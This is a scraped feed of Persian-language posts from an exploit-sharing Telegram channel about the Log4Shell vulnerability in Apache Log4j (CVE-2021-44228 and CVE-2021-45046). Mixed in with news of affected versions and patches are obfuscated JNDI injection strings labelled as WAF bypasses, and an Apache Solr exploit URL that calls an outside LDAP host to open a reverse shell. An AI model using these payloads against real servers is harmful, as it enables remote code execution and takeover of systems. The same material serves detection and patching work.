CVE-2021-44228
* کشف آسیب پذیری بسیار جدی در کتابخانه Log4J *
کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد .
شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور فعال مورد فعال مورد سوء استفاده قرار میگیرد.
این آسیب پذیری این اجازه رو به هکر میده که از راه دور اقدام به کد زدن بکنه ( RCE )
جان گراهام کامینگ مدیر ارشد CloudFlare در این رابطه میگوید :
بهدلیل استفادهی گسترده از جاوا و log4j، این آسیبپذیری بسیار جدی و خطرناک است. حجم عظیمی از نرمافزار جاوا به اینترنت و سیستمهای بکاند متصل است. وقتی به ۱۰ سال گذشته نگاه میکنم، تنها دو آسیبپذیری مشابه دیگر به ذهنم میرسد: یکی Heartbleed که به شما امکان میدهد به اطلاعات سرورهایی دسترسی پیدا کنید که باید امن باشد و دیگری Shellshock که به شما امکان اجرای کد روی سیستمی از راه دور را میداد.
نسخه های دارای آسیب پذیری » 2.0 تا 2.14.1
نسخه فیکس شده » 2.15.0
Exploit
Another Exploit On Github
#RCE #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
* کشف آسیب پذیری بسیار جدی در کتابخانه Log4J *
کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد .
شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور فعال مورد فعال مورد سوء استفاده قرار میگیرد.
این آسیب پذیری این اجازه رو به هکر میده که از راه دور اقدام به کد زدن بکنه ( RCE )
جان گراهام کامینگ مدیر ارشد CloudFlare در این رابطه میگوید :
بهدلیل استفادهی گسترده از جاوا و log4j، این آسیبپذیری بسیار جدی و خطرناک است. حجم عظیمی از نرمافزار جاوا به اینترنت و سیستمهای بکاند متصل است. وقتی به ۱۰ سال گذشته نگاه میکنم، تنها دو آسیبپذیری مشابه دیگر به ذهنم میرسد: یکی Heartbleed که به شما امکان میدهد به اطلاعات سرورهایی دسترسی پیدا کنید که باید امن باشد و دیگری Shellshock که به شما امکان اجرای کد روی سیستمی از راه دور را میداد.
نسخه های دارای آسیب پذیری » 2.0 تا 2.14.1
نسخه فیکس شده » 2.15.0
Exploit
Another Exploit On Github
#RCE #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2021-44228 * کشف آسیب پذیری بسیار جدی در کتابخانه Log4J * کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد . شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور…
Log4Shell Detector v0.1
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
زیاد تست نشده چون ورژن اول هست ممکنه یک سری مشکلات داشته باشه ولی کار میکنه
Github #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
Log4Shell Detector v0.1 زیاد تست نشده چون ورژن اول هست ممکنه یک سری مشکلات داشته باشه ولی کار میکنه Github #Log4J #Java —————— 0Day.Today @LearnExploit @Tech_Army
Apache Log4j 2.14.1 RCE (CVE-2021-44228)
1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
3- ${jndi:rmi://adsasd.asdasd.asdasd}
4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${jndi:ldap://127.0.0.1:1389/ badClassName}
Github
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass WAF
:
1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
3- ${jndi:rmi://adsasd.asdasd.asdasd}
4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
Bypass RC1
:
${jndi:ldap://127.0.0.1:1389/ badClassName}
Github
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
Apache Log4j 2.14.1 RCE (CVE-2021-44228) Bypass WAF : 1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 3- ${jndi:rmi://adsasd.asdasd.asdasd} 4 - ${${lower:jndi}:${lowe…
CVE-2021-44228
#log4j #apache
——————
0Day.Today
@LearnExploit
@Tech_Army
apache solr exploitمنبع :
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
Security Analysis
#log4j #apache
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2021-44228 apache solr exploit /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json منبع : Security Analysis #log4j #apache —————— 0Day.Today @LearnExploit @Tech_Army
افزونه ی burpsuite برای آسیب پذیری log4j
Github
منبع : امنیت اطلاعات
#Log4J #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
منبع : امنیت اطلاعات
#Log4J #burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
کشف آسیب پذیری دوم و جدید در ورژن 2.15 در Log4j با شناسه CVE-2021-45046
این بار به جای Log4shell ما Log4dos رو شاهد هستیم که روی تارگت میخوره
باید به ورژن 2.16 اپدیت کنید یا Jndi رو کلا غیرفعال کنید .
تمامی نسخه های Log4j از Beta9-2.0 تا 2.12.1 /2.13.0 و 2.15.0 آسیب پذیر هستند
#Log4J #Log4dos #Log4shell
——————
0Day.Today
@LearnExploit
@Tech_Army
این بار به جای Log4shell ما Log4dos رو شاهد هستیم که روی تارگت میخوره
باید به ورژن 2.16 اپدیت کنید یا Jndi رو کلا غیرفعال کنید .
تمامی نسخه های Log4j از Beta9-2.0 تا 2.12.1 /2.13.0 و 2.15.0 آسیب پذیر هستند
#Log4J #Log4dos #Log4shell
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
Hikvision log4j PoC ( Hikvision pre-auth log4j Poc )
Github
#POC #log4j
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#POC #log4j
——————
0Day.Today
@LearnExploit
@Tech_Army